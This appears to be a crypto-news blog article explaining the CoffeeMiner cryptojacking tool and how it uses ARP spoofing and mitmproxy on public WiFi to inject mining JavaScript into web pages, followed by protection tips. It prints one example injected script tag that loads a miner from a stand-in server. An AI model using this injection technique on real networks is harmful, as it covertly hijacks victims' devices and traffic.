Amid the cryptocurrency frenzy, the cryptos world has woken up to news of a trending crypto-jacking tool called CoffeeMiner. Apparently, it is possible to mine coins anonymously using the CPUs of those with a penchant for free public WiFi and don’t use VPN as one just needs to use this tool.

Lately, interest in cryptocurrencies has been growing owing to the sudden surge in the value of BTC and ETH. Ransomware attacks in 2017, led by WannaCry and Petya/NonPetya was cyberattackers’ way of getting funds. But the emergence of CoffeeMiner will undoubtedly mark another “peak coinjack.”

What Is CoffeeMiner?

CoffeeMiner is an open-source Python application built by a Barcelona-based software developer called Arnau Code, and it stealthily executes a “man-in-the-middle” (MiTM) attack. Essentially, this tool injects JavaScript code into each website visited by anyone using the WiFi before using their CPUs to mine cryptocurrencies that are mineable via JavaScript.

A “man-in-the-middle” attack is where there’s a middleman on the network who, unknown to you, gets to see all your network requests before they reach their destinations. The person also receives all replies before they get to your PC and can even alter them. And that is precisely what CoffeeMiner does – intercepting your web traffic before the network’s access point, covertly picks up the web page before ‘sneaking’ a line of JavaScript in your reply.

The whole process isn’t elaborate for a smart person. The attack is executed by spoofing Address Resolution Protocol (ARP) messages with a dsniff (an open-source product) that seizes traffic on the network. It then uses Mitmproxy (open-source toolkit) to inject JavaScript into sites users of the network visit. The process is so clean that an ordinary user won’t notice.

The miner is served via an HTTP server as the attackers reroute unsuspecting victims to a server that's under their watch. All these hackers need are as little as 40 seconds of the victim visiting a given website.

What CoffeeMiner Man In The Middle Cryptojacking Does

  • Tricks your browser into thinking it is the WiFi’s access point – using dsniff.
  • Passes on your traffic, except web requests. It pushes the requests into a MiTM proxy – using mitmproxy.
  • Secretly inserts a line of coin-mining JavaScript HTML into the reply.

The line can be something like this: <script src=”http://192.0.2.42:8000/script.js”><script> whereby, 192.0.2.42:8000 is the server running on the computer and is the crypto-mining code. The developer opted for a favorite miner called CoinHive which is capable of mining Monero coins.

According to its developer, public WiFi might now become a source of income for the hacker. The project was released for academic study, but leans upon its most recent discovery on an Argentinian Starbucks Wi-Fi network. The developer also admits the tool works as he also tested it in real-life scenarios.

How To Protect Yourself From CoffeeMiner

Anyone who loves free WiFi can be a victim. The main risk is using an untrusted network since a rogue attacker could be using it to mess with encrypted web traffic. Without HTTP means no confidentiality, identification, and integrity. To be safe, therefore, only use sites that use HTTPS alone, use a VPN if you can’t live without free WiFi and try to watch out!

[FREE] Get Our Best Crypto Trading, Mining & Investing Hacks:

*Action Required* Enter Your Email To Get Insight For Trending Coin News & Reviews

I will never give away, trade or sell your email address. You can unsubscribe at any time.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

13 + twenty =